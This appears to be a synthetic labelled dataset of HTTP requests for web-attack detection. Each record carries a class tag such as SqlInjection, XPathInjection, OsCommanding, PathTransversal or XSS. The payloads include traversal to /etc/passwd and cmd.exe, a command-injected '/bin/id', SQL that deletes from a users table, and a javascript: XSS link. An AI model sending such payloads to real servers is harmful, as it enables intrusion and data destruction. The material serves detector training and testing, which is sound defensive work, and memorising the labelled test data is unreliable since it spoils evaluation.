If-Modified-Since: Mon, 26 Apr 10 01:37:54 UTC
If-Unmodified-Since: Sun, 22 Jul 07 20:34:18 GMT
If-Match: *
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: *
Max-Forwards: 53
Pragma: no-cache
Proxy-Authorization: lerhb ixmcve=esfi
Authorization: wwm4 lhte=39nrsuh
Range: 373-850
Referer: /N6Nmis/necNb/iftOhoc/rts7R.exe
TE: trailers
Trailer: Host
User-Agent: ad7cRopes (hIU-9iDV7; cGzCF4; eWZY0D; cgd48F4M1; rebWBFE-oh)
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 845 138.178.67.166 "pa3sts0" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45067
Start - Id: 48897
class: XPathInjection
GET /apWzajnXC6iybWKMsFZ/3rtt85jRuonist/cSHw6H52.gif?muam=naIw9%2F3env%2Fin%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D162%5D++%7C+neme1i%2Fa%2Fheyteu%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D132%5D++++or+++++%27bbho%27++%3D%27&opwaOetBoenhodz=nhetrjrltaxsa3&oustnevqmtxan=79998583&5WHb4=34897053&sc=tmptdetentcta&soniaouscnh=tDIwkBrTW&feesjsatetl=88386&wu7=ip HTTP/1.0
Host: 161.14.168.27
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: kp1i5ha-eaavhhz, nto28l-eeeh
Cache-Control: xstl4Ixs='edy'
Client-ip: 126.151.123.11
Cookie: cl=osV;5mje=saGtTsakpnt
Cookie2: $Version="62"
Date: Fri, 08 Jul 05 19:35:57 CET
ETag: W/"_ldfV7Hi7T2yZQfxA"
Expect: doeh2s
From: ge7m@nttgt.gov
If-Modified-Since: Wed, 12 Jan 05 15:57:33 GMT
If-Unmodified-Since: Fri, 23 Nov 07 24:31:31 UTC
If-Match: "bE3HV.B4dO84C3qwh"
If-None-Match: "dNS.WFfdXF@MtTF1Zi"
If-Range: Fri, 30 Oct 09 12:39:13 UTC
Max-Forwards: 0
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM bWFzZmV0ZWV0N3FlZWl3c2Fsa3NucmNodnNUeVJpcnJldEU5MXU=
Authorization: Basic ZTZhZTo1dXRvZHBh
Range: 87-22
Referer: /Hpoo/tvtad/lneNt/snditee/b2s0tra.doc
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/7.9 (compatible; MSIE 3.3; Win 9x; ibsfeNseOo; RSeopetmc)
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 978x515
Via: HTTP/9.4 76.89.248.87, 6.1 151.248.15.54, HTTP/1.9 www.triNseen.shtml:84338
Transfer-Encoding: compress
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 250 www.uhvitx.jpg "ayitNbigw5mhwile" 
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 045358782240634
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48897
Start - Id: 37947
class: LdapInjection
GET /szo2ebCLhYPthA-DIwF/tutnsNn/01G4Rrcpyb./ui4auHyob9p6s0idO5/szeMOwaJ-@juG/ith6haret/eeaH12/ameooavuDnPj.aspx?dttco0itodn7tgb=%3Eh1a2l&cft8eixaldEndee=+aichomey6v7rahom&edeworrowse9U=%29+++%28+%7C+++%28obg%3Ds2ouj*%29&yonmseyrnur=hkcT&Hjhm4biframecopyx=0aLt8oe&ftp4.dg=ietcae&ay7m=01908&pqy=5974382 HTTP/1.0
Host: www.ihsesea.it:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tvc-tamhwei;q=0.3, at-csyn
Cache-Control: only-if-cached
Client-ip: 12.199.217.122
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="2"
Date: Mon, 21 Aug 06 23:44:38 UTC
ETag: "aUGFuRHW-zMYOvq2nU"
Expect: 100-continue
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 01 Apr 05 17:43:18 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: *
If-None-Match: "50JG9_b25xdD8wTN2U"
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 98
MIME-Version: 0.6
Pragma: eptnNn=r
Proxy-Authorization: Digest username="toobo"
Authorization: Digest uri=/jrs8/tehhzt/heNhe.bin
Range: 648492-,076146-138301,-5163
Referer: /teonitor/aubaU/utei/lt43eH.swf
TE: chunked,deflate,gzip;q=0.2
Trailer: If-Range
User-Agent: hnse/1.6.0.3.3
UA-CPU: 68000
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8848x2681
Via: 6.8 www.eia6hEei.jpg, FTP/1.9 251.221.152.201, 7.3 169.244.76.129
Transfer-Encoding: deflate
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 143.12.94.194
X-Serial-Number: 8812591
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37947
Start - Id: 49105
class: XPathInjection
GET /hifFcab/If5XY.bin?connectY6r=fs%27+++or+count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i++++%2Bj++++%2B++k++++%2B++++l+++%2B+++1%29%5D+++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++or+++++%27nana%27++%3D++%27++++maf%27++++or&Tueofcozesnutvt=u&Hedcts=0320725&OxtnruatIr3tI8g=3CU&JemsTstmEnot=LAyrnsusrtm12tt&y8epnfild=c3&HhDitaopney4lr=8u+%5D&8rn6ts8aa4I=55&et1tdTR4hM1hxii=r1l%5Dea%26y&uwo5cS=8461991624&5aPB=syhs&yQkir=9eddhi%7Ewy%5Ds&aun=iframeS%7Epf-%24it%3D%3Aayo HTTP/1.1
Host: 137.125.178.41:80
Connection: Svespnt
Accept: */*;q=0.9
Accept-Charset: big5;q=0.9, x-mac-chinesesimp, iso-10646-ucs-2, iso-8859-6;q=0.6, x-mac-ce
Accept-Encoding: *
Accept-Language: *
Cache-Control: ephrtr='dott'
Client-ip: 10.198.108.23
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Wed, 19 Sep 07 07:30:18 CET
ETag: "i9p280DZTSCOq9@T"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Mon, 16 Jan 06 24:44:15 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: *
If-Range: Mon, 30 Aug 04 16:11:58 UTC
Max-Forwards: 18
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: NTLM TmNubjU4MW9paWVvYWh0ZTJlZ3JtaW90ZndzYXVpb2VrdHB0R25jcm9zZWdkZUZn
Range: 80-
Referer: /u6sefTe5/dxwh/Edni2/ot8ide/wdioprl.php4
TE: trailers
Trailer: Referer
User-Agent: spitn/1.6.4.5
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9298x371
Via: 8.6 151.112.194.68
Transfer-Encoding: deflate
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49105
Start - Id: 43072
class: OsCommanding
POST /Eadbn/dk4JUt64Z4aX/7lD.1documentPVaZiR/nsA-rWGtqH_G.ym/s0t4heeea6sr/mStad/tsmO/7amawa4iaouir/Ulilea/hh/rr.sh? HTTP/1.1
Content-Length: 90
Content-Language: ra9iSdla
Content-Encoding: deflate
Content-Location: http://www.aehnn.biz/laPe/5on2oiI/osmrtK/fnefeos.mdb
Content-MD5: a2Nvb25zckk2VXVzZGVpdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Apr 04 22:28:14 UTC
Last-Modified: Mon, 17 Jul 06 11:37:12 UTC
Host: 14.174.200.54
Connection: close
Accept: */*
Accept-Charset: hz-gb-2312
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 159.80.6.131
Cookie: ueatc=pxaa;34RXdBT7r=1kiBv;tse=7377;mq6lOsat6ta=hcR9pplagk;en212bboevtdtdI=hio
Cookie2: $Version="611"
Date: Tue, 14 Apr 09 24:28:43 GMT
ETag: W/"QXl@Wqluj0HKLJ.8Ikl"
Expect: aa20=ttt7;i0sl
From: sTleEdu@dtAttFd.de
If-Modified-Since: Sat, 22 May 04 13:22:12 UTC
If-Unmodified-Since: Mon, 27 Nov 06 22:11:43 UTC
If-Match: "EIcWFLd1wyGPTQrBrG"
If-None-Match: *
If-Range: "nFYupowMN3Zw0Xnal"
Max-Forwards: 94
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: wswe njne=Ot3enhto
Authorization: NTLM aGNUMW5vc2Zmb3N5MnJvY2RuYXI2OHVuNDlhZGhzejdyYW5yaW50ZWVnbGJlbWw=
Range: 53-,7351-3480
Referer: /eowou/X7E0eeE/evctni.mdb
TE: trailers
Trailer: Accept
User-Agent: Mozilla/4.9 (Windows; U; WinNT 7.7; en-sr; rv:2.4.5) Gecko/54353635
UA-CPU: StrongARM
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: FTP/1.4 www.edishi.css, FTP/0.0 202.214.241.95, 5.0 www.R2ccN.html
Transfer-Encoding: compress
Upgrade: erhri/0.9, ete2/3.4, iiro/2.4, Vfj0h/2.8, esebzr/8.5
Warning: 511 www.SwtUak.png "nrU8ee" "Tue, 13 Jan 09 06:56:32 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 206096711388693916
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

eD=0244446793&wp-KSdropjupdatetelnetRUDy=\;\/bin\/id    ;&Os760tssa=alwzlpes

End - Id: 43072
Start - Id: 41246
class: SqlInjection
GET /ewraNmss/r88M@oC@WAi/eP/sidrmtgmhc/CW6d8jB/eBOoH/meo/trPe6Geecneto/3QknzhfxRh8ii1.mdb? HTTP/1.1
Host: 54.242.171.219
Connection: close
Accept: image/jpeg;q=0.2, audio/*;q=0.5, image/gif;q=0.1
Accept-Charset: x-mac-japanese, iso-2022-jp, big5;q=0.1, iso-2022-jp;q=0.4
Accept-Encoding: irO8h7oYe' ); DELETE FROM  users   WHERE  upper(username)  =     upper( 'admin
Accept-Language: *
Cache-Control: max-age=33
Client-ip: 251.101.157.72
Cookie2: $Version="05"
Date: Mon, 21 Sep 09 03:22:14 UTC
ETag: W/"IRuXotHGaw7DbeiTqKmd"
Expect: auPvos
From: oudxnts@auhu3nt.st
If-Modified-Since: Fri, 26 May 06 13:55:29 CET
If-Unmodified-Since: Fri, 17 Jun 05 15:46:05 GMT
If-Match: "dDkviAB7vacA@7Np"
If-None-Match: "VpPG3EnI8skUU4Z5cDCP"
If-Range: *
Max-Forwards: 7
MIME-Version: 4.7
Pragma: d='Ioemim'
Proxy-Authorization: NTLM ZWVOaWxhTG1zUmFpaDRhbG9oSjMzTGFhbzFlbW5lZWk0ZXRlSWV1ZWhuaA==
Authorization: Basic aUlnRWF1OmltZFhpZg==
Referer: http://4osOoi.org/tdssd4/i4ftea/mUeRe0at/luna/eoveanu.png
TE: chunked,trailers,gzip;q=0.7
Trailer: Warning
User-Agent: 2r0aR9h
UA-CPU: 68000
UA-Disp: 9585,9750,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 921x845
Via: 5.4 2.32.141.59, 7.6 136.67.91.118:3, FTP/2.0 www.m6Npe.gif
Transfer-Encoding: identity
Upgrade: nI4c/2.6
Warning: 092 www.sRueG.htm:35899 "atSmsu2feBlep0ass3" "Fri, 30 Jun 06 18:47:30 CET"
X-Forwarded-For: 248.13.251.126
X-Serial-Number: 48880057053
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41246
Start - Id: 36278
class: PathTransversal
GET /pipCFvroen4rdwisLs/aabtpaczytt/_Nm/oTdgCb5bQKLX2zY9lXE/tLDR1ZIxdWWDRzqRsn6/nXNnqHRjo2zD4lPCxi7/HaaofdsE/8L3jOi/eyu.shtml?oonoey=mHH3Qk10BuxK&psrjccqitgeetr=wn+&adminOM64vcN%u4=5410952&sc1nrEgssfens=bc9sk4ect3teorea&rteApm7Ibo1nqte=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&SaoEsycotnyiep=4647738&iarh0ab=dt0epfe5trxostssoi&sul5ilsiub=nT89lBBValA HTTP/1.1
Host: 78.164.114.80:80
Connection: EMTEii
Accept: audio/*;q=0.4, audio/*;q=0.2, image/png;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a-uecoeem, ghosuq-rZ8, lcmwohna-2mcsao;q=0.3, eehy-kdaY, slm-cr
Cache-Control: only-if-cached
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="13"
Date: Tue, 22 May 07 10:24:03 GMT
ETag: W/"9BVqFjumZrGDUWhR"
Expect: eeoeO=e3rsdt9
If-Modified-Since: Thu, 22 Jan 04 08:49:29 UTC
If-Unmodified-Since: Mon, 01 Oct 07 20:33:13 GMT
If-Match: "X-Yv8sav9fTbMZeV"
If-None-Match: "10VRY0GGsC.J-tBl3In"
If-Range: "ZhOvhWNWjGH96p@"
Max-Forwards: 5987
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: NTLM aXVmc2llbjJSZ2VvSGVlc2wwdW90N2FvYWV6ZXRyYWg=
Authorization: en3E fnwxn7=Heyn
Range: 507970-,9199-
Referer: http://En8n.st/cejt/rnhra.htm
TE: deflate,chunked
Trailer: Accept-Encoding
User-Agent: dirvlonar/6.3.9
UA-OS: Solaris
UA-Pixels: 1458x3720
Via: 0.7 www.utnH.tiff, FTP/4.7 38.80.154.241
Transfer-Encoding: identity
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
Warning: 581 90.255.148.33 "sluBdaenaa0lrsll" "Sat, 13 May 06 19:24:02 CET"
X-Serial-Number: 3858869813582017
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36278
Start - Id: 49887
class: XPathInjection
GET /t.Q4X/.ULxp_@q0oN/msm/nadyougbRens/dCrperlv.XC2G/oFWnAROPRbBPtlDig-/bgCkK.shtml?rOhrdWoy5bTde=28443&ao=+sa&slTtkcedD0zv=qh6fandk&jsmaces=15697&hMxrRpositionlsxhtpass=eda9&itaaod8nAb=204105734&TfAAaYcX=TiuheEei%27+or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+++%27eksT5m%27++%3D++++%27&c3ii4s2Smwd=12357&feunsmheuotu=opte&hSitcEmi2rehoi=+uinri%3B8u+n+bidh+&hm2wtdaruh7hno=eccof5ndxsdiOleat HTTP/1.0
Host: 175.184.111.28
Connection: njtsru
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.5, compress, deflate;q=0.0
Accept-Language: 5j5y-trja8ah;q=0.1, dmoravd-zin66da, ujcrb-nWiyi;q=0.5
Cache-Control: min-fresh=65
Client-ip: 192.165.249.59
Cookie: x1bmauUisIFY=HiaYi3uEis;wRWB=17;lt=nculhS;lIzekroshoviln=ntsgxmlNeid>p2
Cookie2: $Version="8"
Date: Sun, 05 Nov 06 01:04:41 CET
ETag: W/"79-wqobJXvLTgCDO1"
Expect: eIGeTy=oploiae;cire=cRuvr
From: ldlcym@E8Sinechia.ch
If-Modified-Since: Sat, 05 Aug 06 14:44:38 GMT
If-Unmodified-Since: Sun, 08 Mar 09 04:38:33 CET
If-Match: *
If-None-Match: "HImC579EhDlvpdI"
If-Range: Mon, 05 Apr 10 20:59:46 GMT
Max-Forwards: 7
MIME-Version: 6.4
Pragma: iiwtSd='a7cbuQrj'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: http://www.Beerat.org/s3unt9oT/e5sfcs/sssnJ97H/jttrpGd/8N1ktree.swf
TE: trailers
Trailer: Connection
User-Agent: Mozilla/6.3 (X11; U; Unix 5.1; ap-ts; rv:6.9.4) Gecko/30849890
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: HTTP/1.6 137.106.141.159:699
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 607 www.ihTevse4.js "aiSomhTteeigt" 
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49887
Start - Id: 49898
class: XPathInjection
GET /n4zFmart0/aU2veOZHKYp.png?y8tyaleeyf=997++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++52477%3D HTTP/1.0
Host: 159.14.227.245
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: a-6;q=0.4, uul-t, gdTitiio-e8a3azd1;q=0.2
Cache-Control: only-if-cached
Client-ip: 113.167.25.66
Cookie: hs=wD;as9=2
Cookie2: $Version="3"
Date: Tue, 19 Dec 06 15:12:35 GMT
ETag: W/"b-3HRHuMckDu@e-89"
Expect: 100-continue
From: t9xyb@dtrmz.gov
If-Modified-Since: Wed, 23 Jun 04 22:59:53 CET
If-Unmodified-Since: Sat, 09 Jan 10 13:35:45 GMT
If-Match: *
If-None-Match: "Qh.rIkOM9jWL_2anXt3"
If-Range: "ji5vS.tKTo0@idHN"
Max-Forwards: 912
MIME-Version: 6.4
Pragma: neetrl='alonm'
Proxy-Authorization: NTLM T2RhYW5lcnJobG1DcjVhZHJucjdlaGFwaWlzY21vM2V0Z3Ju
Authorization: NTLM Y3g3MXZxRHRwZmFEaGVQZGVvbmVlZWRkaXU2bmluY2Fkb2gzZWRyZW4=
Range: 794-
Referer: /ltmsrA.html
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/9.8 (Windows; U; Win98 4.4; u6-ut; rv:4.1.5) Gecko/16229173
UA-CPU: PowerPC
UA-Disp: 2831,824,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9591x1965
Via: 5.9 11.61.213.70:45602, 9.7 www.hdrMwlui.gif, 7.9 220.129.159.234
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 883 www.oeedEt.gif "90sw81n3tnalV" 
X-Forwarded-For: 49.36.115.120
X-Serial-Number: 87544886060
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49898
Start - Id: 35037
class: SqlInjection
GET /RFJQKXetc@/3Q.phpdgY9N/JNS0n/rK9IV/obmoFako/mphob8Mys9iCUe/sAi/cncere/oENl/lwKJhf3.gif?CetwkFeehy=nph-oincludesyowm&neMrC=1284&wloq=s&p.httpfKu5P8A=8Tu6sS&kArm_Dx0nD=znph-&lrijvtcrron51at=3&f6ttsusotu=5967014948&-Hlog-9x817=bulk+++insert+++++Eo+++from+++++%27pwdump.exe%27+++++++++with+++%28codepage%3D%27RAW%27+%29 HTTP/1.1
Host: 57.244.205.145
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: l-qnryth;q=0.0, tEemty64-eretsd;q=0.6, 3od-dennNkja, efmt1st-gio;q=0.6
Cache-Control: max-stale=64
Client-ip: 70.74.68.114
Cookie: -StjRnAXMglL=4976008343;ottesegzt=288487;bformHHgbFwNIRbetween=location0&
Date: Tue, 03 Oct 06 01:29:17 GMT
ETag: W/"0@NBRWxhqqgere4xA"
If-Modified-Since: Thu, 10 Aug 06 08:43:56 GMT
If-Unmodified-Since: Fri, 09 Mar 07 14:39:09 UTC
If-Match: "pqyLo..u@gR_YOMkbEjm"
If-None-Match: "FTM9O3AVyJKps7G"
If-Range: *
Max-Forwards: 124
Authorization: NTLM Y3RhdHd1aGN2aGgxZWV0ZWIyZG90bzloaGN0c25PTW5pdDRwOTlscklvbWVsYWRu
Referer: http://www.hvs2iR.st/o5m4e/8nnIez6w.aspx
TE: trailers
User-Agent: Mozilla/4.0 (X11; U; Solaris 4.8; wp-un; rv:2.5.5) Gecko/24138282
UA-CPU: PowerPC
UA-Color: color8
Transfer-Encoding: mtiugs; 0nfw8g=serem
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35037
Start - Id: 46760
class: XSS
PUT /goia/i7l2JobUc5/udFXqfq/lus/3EQ/saLcErOntebhoq/O2mX_p7I@aGRQP/fS/5SxIEkDQYl@Po_c.e/execBwformYa3u1nph-565connect/tveotr74/JROz9QX@mTXGK.dll? HTTP/1.0
Content-Length: 135
Content-Language: zat2
Content-Encoding: deflate
Content-Location: /lAzatsa/menhst.png
Content-MD5: aWViZXRHdFRlQTNoczE4OQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 17 Sep 08 07:52:59 GMT
Host: 7.223.83.26
Connection: rxjew
Accept: text/*;q=0.6, application/*
Accept-Charset: x-mac-cyrillic;q=0.6, isiri-3342;q=0.7
Accept-Encoding: compress;q=0.3
Accept-Language: *;q=0.0
Date: Mon, 16 Aug 04 08:02:00 GMT
ETag: "m_fZ9yAM@B5V7.Pj."
Expect: tnqid
If-Unmodified-Since: Wed, 28 Apr 04 06:45:57 CET
If-Match: *
If-None-Match: "0JOV5Sq0YhXw@SSpO2KI"
If-Range: *
Pragma: no-cache
Proxy-Authorization: Basic Z212dGU6ZXJyZWRkZQ==
Referer: /i7inRlvt/abod7ri/tRs2lo.exe
TE: gzip;q=0.8,trailers,gzip
User-Agent: pSp2i.X http://www.DIels.net
UA-Color: color32
Transfer-Encoding: gzip

QBGKW=<link     rel   ="     stylesheet   "    href=    "   javascript:   [alert ('Dsaoh3bash');]    ">

End - Id: 46760
Start - Id: 38261
class: LdapInjection
GET /B@2child59psYhtpassa8/h37XBOhRd/nQqIpDlrpiF5h/efH-6x@B/tgb.asmx?Dnqettadg=2162030&do=enifop&Eosa5=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&0dgl5yobjectNxb4_Z=zZKg_nhZ7AS&fcy4c7hheramd=eQatonou HTTP/1.1
Host: www.Yip3d.cz
Connection: keep-alive
Accept: image/*, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: eaA-odsto;q=0.4, o-uv
Cache-Control: no-transform
Client-ip: 113.81.106.78
Cookie: Urq=9154;Ka=tenzihrrr82tVvu9;trfr6ny=spj5nviw;wglnL0acr=08879;hiav=htbpesei3iinssOrc
Cookie2: $Version="57"
Date: Fri, 05 Feb 10 20:07:50 GMT
ETag: W/"vtsbqI40-WbGIOGz"
Expect: ftes
From: Eorust@uthn0.it
If-Modified-Since: Thu, 22 Mar 07 03:57:39 UTC
If-Unmodified-Since: Thu, 11 Nov 04 11:58:07 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 24 Feb 06 04:20:33 UTC
Max-Forwards: 3758
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: NTLM ZXJydTFhY2xuaHV5YTBsYWFlZHVlbmF3aXJkbnV0aW10YQ==
Authorization: NTLM c0ZnZ3duamg3eW9oanN0bXNuZGVzbHN0dG9uYW4yb3VJdHVqUGJ0d29tc2hl
Range: -23
Referer: http://www.ok2EewmN.net/oerriebb/f3na7mb0/oespiucu.js
TE: gzip,deflate;q=0.7,chunked
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.3 (compatible; Konqueror/7.0; Unix; esne; tooio)
UA-CPU: PowerPC
UA-Disp: 775,897,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4041x0261
Via: 5.6 www.hety.css, 0.4 97.201.217.41:83070, aad/6.8 www.vmaei.gif
Transfer-Encoding: tdia8
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 169.43.23.55
X-Serial-Number: 05796287611
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38261
Start - Id: 36524
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 54.244.139.130
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.7, compress, compress;q=0.2, compress;q=0.6, gzip
Accept-Language: yt-hrdi44a, mu-h5, e-c;q=0.9, t-e, xh2pe-e7xenrfr
Cache-Control: max-stale
Client-ip: 65.215.179.86
Cookie: meBo6xeieeseog=wowqmt;esaid73ol1ltc=22100;z8MiP6_=1uI1s23tuI;MmesteaE=94;8UB.V06iE=3\esASa
Cookie2: $Version="016"
Date: Fri, 05 Mar 10 09:51:19 GMT
ETag: W/"MpfI0bsb1HguCI@Llqy"
Expect: aarhruw=emesi
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Thu, 28 Apr 05 10:29:20 GMT
If-Unmodified-Since: Wed, 30 Aug 06 17:29:18 UTC
If-Match: "3OF@B6v2RpG-mDdi@_BQ"
If-None-Match: "Z-DYOiZ.iK-wTpj1"
If-Range: *
Max-Forwards: 34
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Epaq
Authorization: Basic ZWFwZWVWdXM6a3Q3b2JZ
Range: 17-
Referer: http://terd.fr/isnee/Rdee.jsp
TE: deflate;q=0.8,gzip
Trailer: Host
User-Agent: fM9A-qYa http://www.otul.fr
UA-CPU: Sparc
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9877x8489
Via: fef36h/5.9 204.219.158.146:5, 6.2 57.96.151.197, 7.6 46.255.229.252
Transfer-Encoding: deflate
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 264 www.atriB3fe.css "fiechfo" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 5785430371432590
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36524
Start - Id: 45516
class: PathTransversal
GET /vlueoNha4tn1dnS1qnb/pDx@Jf/aimCds4iTll6.dll?meaenhonboTs=n%3A%5Cautoexec.bat&an0en4ni=5pisTh+a%25+&ytAltbsrqoktsi=14&e5s=IdotSms&hsbaCcumdItc=4223608&er2eno=jhechoe%3Asie4&jas=jhsezcprocessing-instruction%28r3%3Eufrom%2Bk HTTP/1.1
Host: www.pnLyn.it:54
Connection: keep-alive
Accept: application/rtf;q=0.4, video/mpeg;q=0.9, video/*
Accept-Charset: x-mac-icelandic;q=0.9, euc-tw
Accept-Encoding: 
Accept-Language: 0-ee9jTr;q=0.2, oFpiewc-tcg;q=0.1, 246-nn;q=0.4
Cache-Control: no-store
Client-ip: 247.212.53.148
Cookie: toa7wssnaVmennF=nwddqmSwqP;rmeZg6k=928904;sam8D93passthruAQxbg=17;387eaNdEeTic=H saesoinsert ;Pupdatelm;1secnglC7eotpmn=iLbx
Cookie2: $Version="37"
Date: Fri, 16 Apr 10 13:32:54 CET
ETag: "cLx8FTIZFHq_bQt6l"
Expect: 100-continue
From: t2hldl05@oephweoTmr.de
If-Modified-Since: Sat, 21 May 05 08:32:21 UTC
If-Unmodified-Since: Fri, 18 Jan 08 17:42:17 GMT
If-Match: *
If-None-Match: "TFUv-j6qTJzVC7.R"
If-Range: *
Max-Forwards: 12
MIME-Version: 8.4
Pragma: nO='aegsLE'
Proxy-Authorization: Basic Q240c1A6bHNqZGRuZ3g=
Authorization: Digest qop=auth
Range: 55569-482846
Referer: /azoiEeu/uEeyewc/0efXrnhi.tiff
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.9 (X11; U; Linux i386 4.0; ef-sh; rv:0.4.0) Gecko/76437145
UA-CPU: x86
UA-Disp: 9630,820,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2096x915
Via: FTP/3.0 www.LeraSla.css
